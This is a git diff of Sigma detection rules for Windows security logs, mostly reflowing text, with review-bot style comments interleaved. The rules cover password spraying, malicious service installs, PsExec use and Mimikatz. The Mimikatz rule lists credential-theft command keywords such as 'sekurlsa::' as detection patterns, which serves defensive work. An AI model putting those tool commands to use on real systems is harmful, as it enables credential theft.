+++ b/sigma/builtin/unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml
@@ -1,7 +1,6 @@
 title: MSI Spawned Cmd and Powershell Spawned Processes
 id: 38cf8340-461b-4857-bf99-23a41f772b18
-description: This rule looks for Windows Installer service (msiexec.exe) spawning
- command line and/or powershell that spawns other processes
+description: This rule looks for Windows Installer service (msiexec.exe) spawning command line and/or powershell that spawns other processes
 status: unsupported
 author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community
 date: 2020/10/13
@@ -14,8 +13,7 @@ tags:
 logsource:
 product: windows
 category: process_creation
- definition: Works only if Enrich Sysmon events with additional information about
- process in ParentOfParentImage check enrichment section
+ definition: Works only if Enrich Sysmon events with additional information about process in ParentOfParentImage check enrichment section
 detection:
 process_creation:
 EventID: 4688
@@ -38,6 +36,6 @@ falsepositives:
 - Unknown
 level: high
 enrichment:
- - EN_0001_cache_sysmon_event_id_1_info
- - EN_0002_enrich_sysmon_event_id_1_with_parent_info
+ - EN_0001_cache_sysmon_event_id_1_info # http://bit.ly/314zc6x
+ - EN_0002_enrich_sysmon_event_id_1_with_parent_info # http://bit.ly/2KmSC0l
 ruletype: Sigma
diff --git a/sigma/builtin/unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml b/sigma/builtin/unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml
index e2f4717d1..f718bb884 100644
--- a/sigma/builtin/unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml
+++ b/sigma/builtin/unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml
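Review bot: The comments added to the two `enrichment` entries reference bit.ly short links, which hide the destination and can be re-pointed by whoever controls the shortener, so a reader of the rule cannot verify what `EN_0001_cache_sysmon_event_id_1_info` and `EN_0002_enrich_sysmon_event_id_1_with_parent_info` refer to without following an opaque redirect. I would replace each with the full URL of the enrichment definition, or name the document instead of linking it, so the reference stays auditable over time. I cannot tell from the hunk what the short links resolve to, so I have not proposed a concrete URL.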
@@ -1,7 +1,6 @@
 title: Windows Kernel and 3rd-Party Drivers Exploits Token Stealing
 id: 8065b1b4-1778-4427-877f-6bf948b26d38
-description: Detection of child processes spawned with SYSTEM privileges by parents
- with non-SYSTEM privileges and Medium integrity level
+description: Detection of child processes spawned with SYSTEM privileges by parents with non-SYSTEM privileges and Medium integrity level
 references:
 - https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment
 tags:
@@ -13,8 +12,7 @@ date: 2019/06/03
 logsource:
 category: process_creation
 product: windows
- definition: Works only if Enrich Sysmon events with additional information about
- process in ParentIntegrityLevel check enrichment section
+ definition: Works only if Enrich Sysmon events with additional information about process in ParentIntegrityLevel check enrichment section
 detection:
 process_creation:
 EventID: 4688
@@ -28,4 +26,5 @@ detection:
 falsepositives:
 - Unknown
 level: high
+
 ruletype: Sigma
diff --git a/sigma/builtin/unsupported/win_mal_service_installs.yml b/sigma/builtin/unsupported/win_mal_service_installs.yml
index a6b9eeeab..8df939a48 100644
--- a/sigma/builtin/unsupported/win_mal_service_installs.yml
+++ b/sigma/builtin/unsupported/win_mal_service_installs.yml
@@ -1,7 +1,6 @@
 title: Malicious Service Installations
 id: 2cfe636e-317a-4bee-9f2c-1066d9f54d1a
-description: Detects known malicious service installs that only appear in cases of
- lateral movement, credential dumping, and other suspicious activities.
+description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.
 author: Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)
 date: 2017/03/27
 modified: 2022/03/21
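Review bot: The `@@ -28,4 +26,5 @@` hunk of win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml adds a bare blank line between `level: high` and `ruletype: Sigma`, which is a stray whitespace change rather than a reflow like the rest of the commit. The other files touched here keep `ruletype: Sigma` directly after the preceding key (`level: low` / `ruletype: Sigma` in proc_creation_win_correlation_multiple_susp_cli.yml, `status: unsupported` / `ruletype: Sigma` in win_metasploit_or_impacket_smb_psexec_service_install.yml), so I would drop the added `+` line to keep the files uniform.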
@@ -13,8 +12,8 @@ tags:
 - attack.persistence
 - attack.privilege_escalation
 - attack.t1003
- - attack.t1035
- - attack.t1050
+ - attack.t1035 # an old one
+ - attack.t1050 # an old one
 - car.2013-09-005
 - attack.t1543.003
 - attack.t1569.002
diff --git a/sigma/builtin/unsupported/win_metasploit_or_impacket_smb_psexec_service_install.yml b/sigma/builtin/unsupported/win_metasploit_or_impacket_smb_psexec_service_install.yml
index dc29a03ff..959be6468 100644
--- a/sigma/builtin/unsupported/win_metasploit_or_impacket_smb_psexec_service_install.yml
+++ b/sigma/builtin/unsupported/win_metasploit_or_impacket_smb_psexec_service_install.yml
@@ -1,7 +1,6 @@
 title: Metasploit Or Impacket Service Installation Via SMB PsExec
 id: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0
-description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and
- Impacket psexec.py by triggering on specific service installation
+description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation
 author: Bartlomiej Czyz, Relativity
 date: 2021/01/21
 modified: 2022/03/21
@@ -25,7 +24,7 @@ detection:
 selection_1:
 ImagePath|re: ^%systemroot%\\[a-zA-Z]{8}\.exe$
 ServiceName|re: (^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)
- StartType: '3'
+ StartType: '3' # on-demand start, see https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4697
 ServiceType: '0x10'
 filter:
 ServiceName: PSEXESVC
@@ -37,8 +36,7 @@ fields:
 - ServiceName
 - ServiceFileName
 falsepositives:
- - Possible, different agents with a 8 character binary and a 4, 8 or 16 character
- service name
+ - Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name
 level: high
 status: unsupported
 ruletype: Sigma
diff --git a/sigma/builtin/unsupported/win_remote_schtask.yml b/sigma/builtin/unsupported/win_remote_schtask.yml
index 450717d33..9efcd82df 100644
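Review bot: `# an old one` on `attack.t1035` and `attack.t1050` says the tags are outdated without saying what replaced them, so the next maintainer still has to look that up, even though the successors are already in the same list two lines below. I would write `- attack.t1035 # deprecated, superseded by attack.t1569.002` and `- attack.t1050 # deprecated, superseded by attack.t1543.003`, or drop the two deprecated tags now that `attack.t1543.003` and `attack.t1569.002` are present. The `tags` block starts outside the hunk, so I cannot see whether other deprecated tags are listed above.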
--- a/sigma/builtin/unsupported/win_remote_schtask.yml
+++ b/sigma/builtin/unsupported/win_remote_schtask.yml
@@ -1,8 +1,7 @@
 title: Remote Schtasks Creation
 id: cf349c4b-99af-40fa-a051-823aa2307a84
 status: unsupported
-description: Detects remote execution via scheduled task creation or update on the
- destination host
+description: Detects remote execution via scheduled task creation or update on the destination host
 author: Jai Minton, oscd.community
 date: 2020/10/05
 references:
@@ -15,9 +14,7 @@ tags:
 logsource:
 product: windows
 service: security
- definition: The Advanced Audit Policy setting Object Access > Audit Other Object
- Access Events has to be configured to allow this detection (not in the baseline
- recommendations by Microsoft).
+ definition: The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection (not in the baseline recommendations by Microsoft).
 detection:
 security:
 Channel: Security
diff --git a/sigma/builtin/unsupported/win_security_global_catalog_enumeration.yml b/sigma/builtin/unsupported/win_security_global_catalog_enumeration.yml
index 9b5cf3bae..c2f881cf5 100644
--- a/sigma/builtin/unsupported/win_security_global_catalog_enumeration.yml
+++ b/sigma/builtin/unsupported/win_security_global_catalog_enumeration.yml
@@ -1,9 +1,7 @@
 title: Enumeration via the Global Catalog
 id: 619b020f-0fd7-4f23-87db-3f51ef837a34
 status: unsupported
-description: Detects enumeration of the global catalog (that can be performed using
- BloodHound or others AD reconnaissance tools). Adjust Threshold according to domain
- width.
+description: Detects enumeration of the global catalog (that can be performed using BloodHound or others AD reconnaissance tools). Adjust Threshold according to domain width.
 references:
 - https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5156
 author: Chakib Gzenayi (@Chak092), Hosni Mribah
@@ -15,8 +13,7 @@ tags:
 logsource:
 product: windows
 service: security
- definition: The advanced audit policy setting "Windows Filtering Platform > Filtering
- Platform Connection" must be configured for Success
+ definition: The advanced audit policy setting "Windows Filtering Platform > Filtering Platform Connection" must be configured for Success
 detection:
 security:
 Channel: Security
diff --git a/sigma/builtin/unsupported/win_security_rare_schtasks_creations.yml b/sigma/builtin/unsupported/win_security_rare_schtasks_creations.yml
index 9c3d7bb2b..f644638af 100644
--- a/sigma/builtin/unsupported/win_security_rare_schtasks_creations.yml
+++ b/sigma/builtin/unsupported/win_security_rare_schtasks_creations.yml
@@ -1,9 +1,7 @@
 title: Rare Schtasks Creations
 id: b0d77106-7bb0-41fe-bd94-d1752164d066
 status: unsupported
-description: Detects rare scheduled tasks creations that only appear a few times per
- time frame and could reveal password dumpers, backdoor installs or other types
- of malicious code
+description: Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code
 author: Florian Roth (Nextron Systems)
 date: 2017/03/23
 modified: 2023/02/24
@@ -16,10 +14,7 @@ tags:
 logsource:
 product: windows
 service: security
- definition: The Advanced Audit Policy setting Object Access > Audit Other Object
- Access Events has to be configured to allow this detection (not in the baseline
- recommendations by Microsoft). We also recommend extracting the Command field
- from the embedded XML in the event data.
+ definition: The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection (not in the baseline recommendations by Microsoft). We also recommend extracting the Command field from the embedded XML in the event data.
 detection:
 security:
 Channel: Security
diff --git a/sigma/builtin/unsupported/win_security_susp_failed_logons_explicit_credentials.yml b/sigma/builtin/unsupported/win_security_susp_failed_logons_explicit_credentials.yml
index 8396524c9..079ae0258 100644
--- a/sigma/builtin/unsupported/win_security_susp_failed_logons_explicit_credentials.yml
+++ b/sigma/builtin/unsupported/win_security_susp_failed_logons_explicit_credentials.yml
@@ -1,8 +1,7 @@
 title: Password Spraying via Explicit Credentials
 id: 196a29c2-e378-48d8-ba07-8a9e61f7fab9
 status: unsupported
-description: Detects a single user failing to authenticate to multiple users using
- explicit credentials.
+description: Detects a single user failing to authenticate to multiple users using explicit credentials.
 references:
 - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying
 author: Mauricio Velazco, Zach Mathis
@@ -21,10 +20,9 @@ detection:
 selection:
 EventID: 4648
 filter:
- SubjectUserName|endswith: $
+ SubjectUserName|endswith: $ # There will be much noise from computer accounts to UMFD-0, DWM-1, etc...
 timeframe: 1h
- condition: (security and selection and not filter) | count(TargetUserName) by
- SubjectUserName > 10
+ condition: (security and selection and not filter) | count(TargetUserName) by SubjectUserName > 10
 falsepositives:
 - Terminal servers
 - Jump servers
diff --git a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_process.yml b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_process.yml
index 5ab29d7f5..68a36f1e6 100644
--- a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_process.yml
+++ b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_process.yml
@@ -1,8 +1,7 @@
 title: Multiple Users Failing to Authenticate from Single Process
 id: fe563ab6-ded4-4916-b49f-a3a8445fe280
 status: unsupported
-description: Detects failed logins with multiple accounts from a single process on
- the system.
+description: Detects failed logins with multiple accounts from a single process on the system.
 references:
 - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying
 - https://www.trimarcsecurity.com/single-post/2018/05/06/trimarc-research-detecting-password-spraying-with-security-event-auditing
@@ -25,8 +24,7 @@ detection:
 filter:
 ProcessName: '-'
 timeframe: 24h
- condition: (security and selection1 and not filter) | count(TargetUserName) by
- ProcessName > 10
+ condition: (security and selection1 and not filter) | count(TargetUserName) by ProcessName > 10
 falsepositives:
 - Terminal servers
 - Jump servers
diff --git a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source.yml b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source.yml
index 7414cef42..cd9967929 100644
--- a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source.yml
+++ b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source.yml
@@ -1,8 +1,7 @@
 title: Failed Logins with Different Accounts from Single Source System
 id: e98374a6-e2d9-4076-9b5c-11bdb2569995
 status: unsupported
-description: Detects suspicious failed logins with different user accounts from a
- single source system
+description: Detects suspicious failed logins with different user accounts from a single source system
 author: Florian Roth (Nextron Systems)
 date: 2017/01/10
 modified: 2023/02/24
@@ -22,8 +21,7 @@ detection:
 - 4625
 TargetUserName: '*'
 WorkstationName: '*'
- condition: (security and selection1) | count(TargetUserName) by WorkstationName
- > 3
+ condition: (security and selection1) | count(TargetUserName) by WorkstationName > 3
 falsepositives:
 - Terminal servers
 - Jump servers
diff --git a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source2.yml b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source2.yml
index 2d51cefb1..288ec4a8b 100644
--- a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source2.yml
+++ b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source2.yml
@@ -1,11 +1,10 @@
 title: Failed NTLM Logins with Different Accounts from Single Source System
 id: 6309ffc4-8fa2-47cf-96b8-a2f72e58e538
 related:
- - id: e98374a6-e2d9-4076-9b5c-11bdb2569995
- type: derived
+ - id: e98374a6-e2d9-4076-9b5c-11bdb2569995
+ type: derived
 status: unsupported
-description: Detects suspicious failed logins with different user accounts from a
- single source system
+description: Detects suspicious failed logins with different user accounts from a single source system
 author: Florian Roth (Nextron Systems)
 date: 2017/01/10
 modified: 2023/02/24
@@ -24,8 +23,7 @@ detection:
 TargetUserName: '*'
 Workstation: '*'
 timeframe: 24h
- condition: (security and selection2) | count(TargetUserName) by Workstation >
- 3
+ condition: (security and selection2) | count(TargetUserName) by Workstation > 3
 falsepositives:
 - Terminal servers
 - Jump servers
diff --git a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos.yml b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos.yml
index 9b72c840a..6d377109b 100644
--- a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos.yml
+++ b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos.yml
@@ -1,8 +1,7 @@
 title: Valid Users Failing to Authenticate From Single Source Using Kerberos
 id: 5d1d946e-32e6-4d9a-a0dc-0ac022c7eb98
 status: unsupported
-description: Detects multiple failed logins with multiple valid domain accounts from
- a single source system using the Kerberos protocol.
+description: Detects multiple failed logins with multiple valid domain accounts from a single source system using the Kerberos protocol.
 references:
 - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying
 author: Mauricio Velazco, frack113
@@ -24,8 +23,7 @@ detection:
 filter_computer:
 TargetUserName|endswith: $
 timeframe: 24h
- condition: (security and selection and not filter_computer) | count(TargetUserName)
- by IpAddress > 10
+ condition: (security and selection and not filter_computer) | count(TargetUserName) by IpAddress > 10
 falsepositives:
 - Vulnerability scanners
 - Misconfigured systems
diff --git a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos2.yml b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos2.yml
index 2fa17b13e..36a78a5db 100644
--- a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos2.yml
+++ b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos2.yml
@@ -1,8 +1,7 @@
 title: Disabled Users Failing To Authenticate From Source Using Kerberos
 id: 4b6fe998-b69c-46d8-901b-13677c9fb663
 status: unsupported
-description: Detects failed logins with multiple disabled domain accounts from a single
- source system using the Kerberos protocol.
+description: Detects failed logins with multiple disabled domain accounts from a single source system using the Kerberos protocol.
 references:
 - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying
 author: Mauricio Velazco, frack113
@@ -24,8 +23,7 @@ detection:
 filter_computer:
 TargetUserName|endswith: $
 timeframe: 24h
- condition: (security and selection and not filter_computer) | count(TargetUserName)
- by IpAddress > 10
+ condition: (security and selection and not filter_computer) | count(TargetUserName) by IpAddress > 10
 falsepositives:
 - Vulnerability scanners
 - Misconfigured systems
diff --git a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos3.yml b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos3.yml
index 3acd6ea2c..390f9878f 100644
--- a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos3.yml
+++ b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos3.yml
@@ -1,8 +1,7 @@
 title: Invalid Users Failing To Authenticate From Source Using Kerberos
 id: bc93dfe6-8242-411e-a2dd-d16fa0cc8564
 status: unsupported
-description: Detects failed logins with multiple invalid domain accounts from a single
- source system using the Kerberos protocol.
+description: Detects failed logins with multiple invalid domain accounts from a single source system using the Kerberos protocol.
 references:
 - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying
 author: Mauricio Velazco, frack113
@@ -24,8 +23,7 @@ detection:
 filter_computer:
 TargetUserName|endswith: $
 timeframe: 24h
- condition: (security and selection and not filter_computer) | count(TargetUserName)
- by IpAddress > 10
+ condition: (security and selection and not filter_computer) | count(TargetUserName) by IpAddress > 10
 falsepositives:
 - Vulnerability scanners
 - Misconfigured systems
diff --git a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_ntlm.yml b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_ntlm.yml
index 43fb00054..aa52ec356 100644
--- a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_ntlm.yml
+++ b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_ntlm.yml
@@ -1,8 +1,7 @@
 title: Valid Users Failing to Authenticate from Single Source Using NTLM
 id: f88bab7f-b1f4-41bb-bdb1-4b8af35b0470
 status: unsupported
-description: Detects failed logins with multiple valid domain accounts from a single
- source system using the NTLM protocol.
+description: Detects failed logins with multiple valid domain accounts from a single source system using the NTLM protocol.
 references:
 - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying
 author: Mauricio Velazco
@@ -20,12 +19,11 @@ detection:
 Channel: Security
 selection1:
 EventID: 4776
- Status: '*0xC000006A'
+ Status: '*0xC000006A' #Account logon with misspelled or bad password.
 filter:
 TargetUserName: '*$'
 timeframe: 24h
- condition: (security and selection1 and not filter) | count(TargetUserName) by
- Workstation > 10
+ condition: (security and selection1 and not filter) | count(TargetUserName) by Workstation > 10
 falsepositives:
 - Terminal servers
 - Jump servers
diff --git a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_ntlm2.yml b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_ntlm2.yml
index 44ab6de41..155d41659 100644
--- a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_ntlm2.yml
+++ b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_ntlm2.yml
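Review bot: The comment added to `Status: '*0xC000006A'` has no space after the hash (`#Account logon ...`), unlike every other comment this commit adds (`# on-demand start`, `# an old one`, and `# The username you typed does not exist.` in the next file), so the style is inconsistent within one change set. I would write `Status: '*0xC000006A' # Account logon with misspelled or bad password.` to keep it uniform. The matching comment in win_security_susp_failed_logons_single_source_ntlm2.yml is already spaced correctly.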
@@ -1,8 +1,7 @@
 title: Invalid Users Failing To Authenticate From Single Source Using NTLM
 id: 56d62ef8-3462-4890-9859-7b41e541f8d5
 status: unsupported
-description: Detects failed logins with multiple invalid domain accounts from a single
- source system using the NTLM protocol.
+description: Detects failed logins with multiple invalid domain accounts from a single source system using the NTLM protocol.
 references:
 - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying
 author: Mauricio Velazco
@@ -20,12 +19,11 @@ detection:
 Channel: Security
 selection1:
 EventID: 4776
- Status: '*0xC0000064'
+ Status: '*0xC0000064' # The username you typed does not exist. Bad username.
 filter:
 TargetUserName: '*$'
 timeframe: 24h
- condition: (security and selection1 and not filter) | count(TargetUserName) by
- Workstation > 10
+ condition: (security and selection1 and not filter) | count(TargetUserName) by Workstation > 10
 falsepositives:
 - Terminal servers
 - Jump servers
diff --git a/sigma/builtin/unsupported/win_security_susp_failed_remote_logons_single_source.yml b/sigma/builtin/unsupported/win_security_susp_failed_remote_logons_single_source.yml
index 87599876b..a97fb5f96 100644
--- a/sigma/builtin/unsupported/win_security_susp_failed_remote_logons_single_source.yml
+++ b/sigma/builtin/unsupported/win_security_susp_failed_remote_logons_single_source.yml
@@ -1,8 +1,7 @@
 title: Multiple Users Remotely Failing To Authenticate From Single Source
 id: add2ef8d-dc91-4002-9e7e-f2702369f53a
 status: unsupported
-description: Detects a source system failing to authenticate against a remote host
- with multiple users.
+description: Detects a source system failing to authenticate against a remote host with multiple users.
 references:
 - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying
 author: Mauricio Velazco
@@ -24,8 +23,7 @@ detection:
 filter:
 IpAddress: '-'
 timeframe: 24h
- condition: (security and selection1 and not filter) | count(TargetUserName) by
- IpAddress > 10
+ condition: (security and selection1 and not filter) | count(TargetUserName) by IpAddress > 10
 falsepositives:
 - Terminal servers
 - Jump servers
diff --git a/sigma/builtin/unsupported/win_security_susp_multiple_files_renamed_or_deleted.yml b/sigma/builtin/unsupported/win_security_susp_multiple_files_renamed_or_deleted.yml
index bcaa2782f..e979ad860 100644
--- a/sigma/builtin/unsupported/win_security_susp_multiple_files_renamed_or_deleted.yml
+++ b/sigma/builtin/unsupported/win_security_susp_multiple_files_renamed_or_deleted.yml
@@ -1,8 +1,7 @@
 title: Suspicious Multiple File Rename Or Delete Occurred
 id: 97919310-06a7-482c-9639-92b67ed63cf8
 status: unsupported
-description: Detects multiple file rename or delete events occurrence within a specified
- period of time by a same user (these events may signalize about ransomware activity).
+description: Detects multiple file rename or delete events occurrence within a specified period of time by a same user (these events may signalize about ransomware activity).
 references:
 - https://www.manageengine.com/data-security/how-to/how-to-detect-ransomware-attacks.html
 author: Vasiliy Burov, oscd.community
@@ -14,9 +13,7 @@ tags:
 logsource:
 product: windows
 service: security
- definition: 'Requirements: Audit Policy : Policies/Windows Settings/Security Settings/Local
- Policies/Audit Policy/Audit object access, Policies/Windows Settings/Security
- Settings/Advanced Audit Policy Configuration/Object Access'
+ definition: 'Requirements: Audit Policy : Policies/Windows Settings/Security Settings/Local Policies/Audit Policy/Audit object access, Policies/Windows Settings/Security Settings/Advanced Audit Policy Configuration/Object Access'
 detection:
 security:
 Channel: Security
diff --git a/sigma/builtin/unsupported/win_security_susp_samr_pwset.yml b/sigma/builtin/unsupported/win_security_susp_samr_pwset.yml
index 8d6971e0b..85a565653 100644
--- a/sigma/builtin/unsupported/win_security_susp_samr_pwset.yml
+++ b/sigma/builtin/unsupported/win_security_susp_samr_pwset.yml
@@ -1,13 +1,9 @@
 title: Possible Remote Password Change Through SAMR
 id: 7818b381-5eb1-4641-bea5-ef9e4cfb5951
 status: unsupported
-description: 'Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser()
- or SamSetInformationUser().
-
- "Audit User Account Management" in "Advanced Audit Policy Configuration" has to
- be enabled in your local security policy / GPO to see this events.
-
- '
+description: |
+ Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser().
+ "Audit User Account Management" in "Advanced Audit Policy Configuration" has to be enabled in your local security policy / GPO to see this events.
 author: Dimitrios Slamaris
 date: 2017/06/09
 modified: 2023/02/24
@@ -26,9 +22,8 @@ detection:
 passwordchanged:
 EventID: 4738
 passwordchanged_filter:
- PasswordLastSet: null
+ PasswordLastSet:
 timeframe: 15s
- condition: security and (( passwordchanged and not passwordchanged_filter ) |
- near samrpipe)
+ condition: security and (( passwordchanged and not passwordchanged_filter ) | near samrpipe)
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/unsupported/win_system_rare_service_installs.yml b/sigma/builtin/unsupported/win_system_rare_service_installs.yml
index 696c0dd1e..550ae784f 100644
--- a/sigma/builtin/unsupported/win_system_rare_service_installs.yml
+++ b/sigma/builtin/unsupported/win_system_rare_service_installs.yml
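Review bot: `PasswordLastSet:` with no value in the `@@ -26,9 +22,8 @@` hunk is parsed as a YAML null exactly as `PasswordLastSet: null` was, so `not passwordchanged_filter` should still keep only 4738 events where the field is populated, but the bare key now reads like an unfinished line rather than a deliberate null match, and the next reflow or linter is likely to "fix" it. I would keep the explicit form, `PasswordLastSet: null`, or annotate the new line, `PasswordLastSet:  # null: match events where the field is absent or empty`, so the intent survives. The `samrpipe` selection the condition refers to starts outside the hunk, so I cannot see how the pipe match is defined.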
@@ -1,9 +1,7 @@
 title: Rare Service Installations
 id: 66bfef30-22a5-4fcd-ad44-8d81e60922ae
 status: unsupported
-description: Detects rare service installs that only appear a few times per time frame
- and could reveal password dumpers, backdoor installs or other types of malicious
- services
+description: Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services
 author: Florian Roth (Nextron Systems)
 date: 2017/03/08
 modified: 2023/02/24
diff --git a/sigma/builtin/unsupported/win_taskscheduler_rare_schtask_creation.yml b/sigma/builtin/unsupported/win_taskscheduler_rare_schtask_creation.yml
index c5f94bb89..09e8dc043 100644
--- a/sigma/builtin/unsupported/win_taskscheduler_rare_schtask_creation.yml
+++ b/sigma/builtin/unsupported/win_taskscheduler_rare_schtask_creation.yml
@@ -1,9 +1,7 @@
 title: Rare Scheduled Task Creations
 id: b20f6158-9438-41be-83da-a5a16ac90c2b
 status: unsupported
-description: This rule detects rare scheduled task creations. Typically software gets
- installed on multiple systems and not only on a few. The aggregation and count
- function selects tasks with rare names.
+description: This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.
 author: Florian Roth (Nextron Systems)
 date: 2017/03/17
 modified: 2023/02/24
@@ -14,8 +12,7 @@ tags:
 logsource:
 product: windows
 service: taskscheduler
- definition: the "Microsoft-Windows-TaskScheduler/Operational" is disabled by default
- and should be enabled in order for this detection to work
+ definition: the "Microsoft-Windows-TaskScheduler/Operational" is disabled by default and should be enabled in order for this detection to work
 detection:
 taskscheduler:
 Channel: Microsoft-Windows-TaskScheduler/Operational
@@ -24,8 +21,7 @@ detection:
 filter1:
 TaskName: \Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan
 timeframe: 7d
- condition: (taskscheduler and selection and not 1 of filter*) | count() by TaskName
- < 5
+ condition: (taskscheduler and selection and not 1 of filter*) | count() by TaskName < 5
 falsepositives:
 - Software installation
 level: low
diff --git a/sigma/builtin/win_alert_mimikatz_keywords.yml b/sigma/builtin/win_alert_mimikatz_keywords.yml
index 653cb3d11..ef1feb11b 100644
--- a/sigma/builtin/win_alert_mimikatz_keywords.yml
+++ b/sigma/builtin/win_alert_mimikatz_keywords.yml
@@ -1,9 +1,7 @@
 title: Mimikatz Use
 id: 06d71506-7beb-4f22-8888-e2e5e2ca7fd8
 status: test
-description: This method detects mimikatz keywords in different Eventlogs (some of
- them only appear in older Mimikatz version that are however still used by different
- threat groups)
+description: This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)
 references:
 - https://tools.thehacker.recipes/mimikatz/modules
 author: Florian Roth (Nextron Systems), David ANDRE (additional keywords)
@@ -44,7 +42,7 @@ detection:
 - privilege::driver
 - 'sekurlsa::'
 filter:
- EventID: 15
+ EventID: 15 # Sysmon's FileStream Events (could cause false positives when Sigma rules get copied on/to a system)
 condition: keywords and not filter
 falsepositives:
 - Naughty administrators
diff --git a/sigma/builtin/windefend/win_defender_antimalware_platform_expired.yml b/sigma/builtin/windefend/win_defender_antimalware_platform_expired.yml
index 603cf8d29..69554c139 100644
--- a/sigma/builtin/windefend/win_defender_antimalware_platform_expired.yml
+++ b/sigma/builtin/windefend/win_defender_antimalware_platform_expired.yml
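Review bot: The comment added to `EventID: 15` in win_alert_mimikatz_keywords.yml says the filter is there to drop Sysmon FileStream events, but the filter as written matches event ID 15 from any channel, so a keyword hit inside an event 15 of some other log would be suppressed too and the comment overstates how narrow the exclusion is. Scoping the filter to the Sysmon log, e.g. adding `Channel: Microsoft-Windows-Sysmon/Operational` alongside `EventID: 15`, would make the behaviour match the stated intent; if the broader exclusion is deliberate, the comment should say so. The `keywords` block and the `detection` header start outside the hunk, so I cannot see whether a channel constraint already exists elsewhere in the rule.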
@@ -1,19 +1,16 @@ title: Windows Defender Grace Period Expired id: 360a1340-398a-46b6-8d06-99b905dc69d2 related: - - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 - type: obsoletes + - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 + type: obsoletes status: stable -description: 'Detects the expiration of the grace period of Windows Defender. This - means protection against viruses, spyware, and other potentially unwanted software - is disabled. - - ' +description: | + Detects the expiration of the grace period of Windows Defender. This means protection against viruses, spyware, and other potentially unwanted software is disabled. references: - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5101 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/ -author: "J\xE1n Tren\u010Dansk\xFD, frack113" +author: Ján Trenčanský, frack113 date: 2020/07/28 modified: 2023/11/22 tags: @@ -26,7 +23,7 @@ detection: windefend: Channel: Microsoft-Windows-Windows 